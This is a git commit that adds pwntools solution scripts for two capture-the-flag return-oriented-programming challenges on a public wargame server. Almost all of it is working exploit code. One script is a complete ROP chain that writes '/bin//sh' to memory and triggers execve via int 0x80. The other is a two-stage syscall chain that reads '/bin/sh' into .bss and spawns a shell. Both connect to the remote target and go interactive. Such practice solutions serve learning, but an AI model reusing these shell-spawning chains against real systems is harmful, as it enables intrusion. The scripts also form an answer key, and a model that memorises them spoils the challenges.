Finished nx/rop, nx/rop2

2021-09-05 21:05:12 +08:00
parent f41c482911
commit 8ac728ce3a
5 changed files with 86 additions and 0 deletions
--- a/nx/rop/answer.py
+++ b/nx/rop/answer.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+# ROPgadget --binary rop --ropchain
+
+# Padding goes here
+p = 0x10*'0'
+
+p += pack('<I', 0x0806ecda) # pop edx ; ret
+p += pack('<I', 0x080ea060) # @ .data
+p += pack('<I', 0x080b8016) # pop eax ; ret
+p += '/bin'
+p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
+p += pack('<I', 0x0806ecda) # pop edx ; ret
+p += pack('<I', 0x080ea064) # @ .data + 4
+p += pack('<I', 0x080b8016) # pop eax ; ret
+p += '//sh'
+p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
+p += pack('<I', 0x0806ecda) # pop edx ; ret
+p += pack('<I', 0x080ea068) # @ .data + 8
+p += pack('<I', 0x080492d3) # xor eax, eax ; ret
+p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
+p += pack('<I', 0x080481c9) # pop ebx ; ret
+p += pack('<I', 0x080ea060) # @ .data
+p += pack('<I', 0x080de769) # pop ecx ; ret
+p += pack('<I', 0x080ea068) # @ .data + 8
+p += pack('<I', 0x0806ecda) # pop edx ; ret
+p += pack('<I', 0x080ea068) # @ .data + 8
+p += pack('<I', 0x080492d3) # xor eax, eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0807a66f) # inc eax ; ret
+p += pack('<I', 0x0806c943) # int 0x80
+
+io = remote("hackme.inndy.tw", 7704)
+#io = process('./rop')
+io.sendline(p)
+io.interactive()
--- a/nx/rop/rop
+++ b/nx/rop/rop
--- a/nx/rop2/answer.py
+++ b/nx/rop2/answer.py
@@ -0,0 +1,36 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = remote("hackme.inndy.tw", 7703)
+#p = process('./rop2')
+elf = ELF('./rop2')
+
+syscall_plt = elf.plt['syscall']
+overflow_func = elf.sym['overflow']
+main_func = elf.sym['main']
+bss_buf = elf.bss()
+
+p.recvuntil("ropchain:")
+payload1 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(3)+p32(0)+p32(bss_buf)+p32(1024)
+p.sendline(payload1)
+
+payload2 = "/bin/sh\x00"
+p.sendline(payload2)
+
+p.recvuntil("ropchain:")
+payload3 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(11)+p32(bss_buf)+p32(0)+p32(0)
+p.sendline(payload3)
+
+with open("poc.txt", "w") as f:
+    f.write(payload1)
+    f.write("\n")
+    f.write(payload2)
+    f.write("\n")
+    f.write(payload3)
+    f.write("\n")
+
+p.interactive()
--- a/nx/rop2/poc.txt
+++ b/nx/rop2/poc.txt
--- a/nx/rop2/rop2
+++ b/nx/rop2/rop2